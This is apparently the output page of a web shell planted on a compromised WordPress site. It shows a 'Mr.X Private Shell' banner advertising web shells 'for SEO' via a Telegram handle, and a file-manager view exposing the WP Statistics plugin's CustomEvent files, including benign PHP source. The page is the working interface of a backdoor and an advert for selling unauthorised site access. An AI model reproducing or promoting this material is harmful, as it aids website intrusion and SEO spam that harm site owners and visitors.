__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace WP_Statistics\Service\CustomEvent;
class CustomEventManager
{
public function __construct()
{
add_action('admin_init', [$this, 'registerAjaxCallbacks']);
}
public function registerAjaxCallbacks()
{
$customEventActions = new CustomEventActions();
$customEventActions->register();
}
}| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| CustomEventActions.php | File | 1.85 KB | 0644 |
|
| CustomEventDataParser.php | File | 4.21 KB | 0644 |
|
| CustomEventHelper.php | File | 3.7 KB | 0644 |
|
| CustomEventManager.php | File | 349 B | 0644 |
|